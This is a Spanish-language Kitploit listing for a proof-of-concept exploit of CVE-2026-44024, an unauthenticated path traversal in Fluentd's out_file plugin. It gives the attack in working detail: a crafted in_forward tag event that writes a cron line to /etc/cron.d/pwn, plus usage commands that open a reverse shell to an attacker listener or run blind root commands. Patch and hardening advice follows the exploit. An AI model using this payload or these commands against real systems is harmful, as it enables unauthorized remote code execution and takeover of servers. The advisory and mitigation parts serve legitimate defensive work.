Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-44024_exploit — Exploit de prueba de concepto para CVE-2026-44024, que utiliza una etiqueta in_forward manipulada para escribir archivos arbitrarios mediante el path traversal de out_file de Fluentd y desencadenar la ejecución de comandos. | Kitploit
Herramientas/GitHubGitHub/0xdak/cve-2026-44024_exploit
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónRed Teaming
GitHub0xdak/cve-2026-44024_exploit

CVE-2026-44024_exploit

Exploit de prueba de concepto para CVE-2026-44024, que utiliza una etiqueta in_forward manipulada para escribir archivos arbitrarios mediante el path traversal de out_file de Fluentd y desencadenar la ejecución de comandos.

Ver Repositorio
hace 15 díasAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-44024 — Escritura arbitraria de archivos por Path Traversal en out_file ${tag} de Fluentd

Escritura arbitraria de archivos sin autenticación en el plugin out_file de Fluentd mediante el marcador de posición ${tag}.

out_file permite a los operadores parametrizar la ruta de salida con un marcador de posición ${tag} (p. ej., path /var/log/fluent/${tag}). Output#extract_placeholders (lib/fluent/plugin/output.rb) sustituye la etiqueta del evento en la ruta sin sanear ../ (CWE-22):

root@kitploit:~
if str.include?('${tag}')
  rvalue = rvalue.gsub('${tag}', metadata.tag)   # attacker-controlled tag, no ../ check

Los eventos que llegan a través del protocolo in_forward (puerto 24224) llevan una etiqueta tomada literalmente del mensaje de red, y allow_anonymous_source está a true por defecto, por lo que un atacante no autenticado puede establecer una etiqueta como ../../../../../../etc/cron.d/pwn para escapar del directorio configurado y escribir en una ruta absoluta arbitraria como el usuario del proceso fluentd.

  • Afectado: Fluentd <= 1.19.2
  • Corregido: 1.19.3 (rechaza los componentes ..//absolutos en la etiqueta antes de expandir ${tag}, PR #5391)
  • CWE: 22 (Path Traversal) / 94 (Inyección de código mediante el contenido escrito)
  • Puertos: 24224 (forward — el vector), 9880 (http)
  • Impacto: escritura arbitraria de archivos como el usuario de fluentd → RCE (p. ej., una línea de cron de root)

Importante — el vector es in_forward, no in_http

in_http deriva la etiqueta de la ruta de la URL con path.split('/').join('.'), lo que convierte cada / en ., por lo que ../ no puede sobrevivir en Linux (y %2f no se decodifica). Solo el protocolo forward (24224) transmite la etiqueta byte a byte. Este exploit habla lo justo de ese protocolo (un mensaje msgpack [tag, time, record]) con un codificador integrado muy pequeño: sin dependencias.

Requisitos

Solo biblioteca estándar de Python 3. El objetivo debe ejecutar un Fluentd vulnerable con un out_file cuya path contenga ${tag}, y una fuente in_forward anónima (valores por defecto). Convertir la escritura en una caída limpia de cron asume un out_file que no altere el nombre/el contenido del archivo (p. ej. add_path_suffix false, append true, sin timekey, formato single_value) — de lo contrario, usa la escritura de archivos para sobrescribir un archivo de ruta conocida.

Uso

root@kitploit:~
# reverse shell (start a listener first: nc -lvnp 4444). Fires via cron within ~60s.
python3 exploit.py 10.10.10.10 --shell 10.10.14.5:4444

# blind command as root
python3 exploit.py 10.10.10.10 -c 'id > /tmp/pwned'

# custom forward port
python3 exploit.py 10.10.10.10:24224 --shell 10.10.14.5:4444

Cómo funciona

Envía un evento forward ["../../../../../../etc/cron.d/pwn", <time>, {"msg": "* * * * * root <cmd>"}] al puerto 24224. out_file expande ${tag} → /var/log/fluent/../../../../../../etc/cron.d/pwn = /etc/cron.d/pwn, y (con un formato single_value) escribe el msg del registro literalmente → una línea cron válida. cron lo ejecuta en unos 60 s como el usuario de fluentd (root donde fluentd se ejecuta como root).

Mitigación

Actualice Fluentd a ≥ 1.19.3; no exponga el puerto forward a redes no confiables (habilite la autenticación con clave compartida / allow_anonymous_source false); no ejecute fluentd como root; evite ${tag} en las rutas de salida para entradas no confiables.

Descargo de responsabilidad

Solo para pruebas de seguridad autorizadas y fines educativos. Úselo únicamente contra sistemas que posea o para los que tenga permiso explícito de prueba.

Descargar herramienta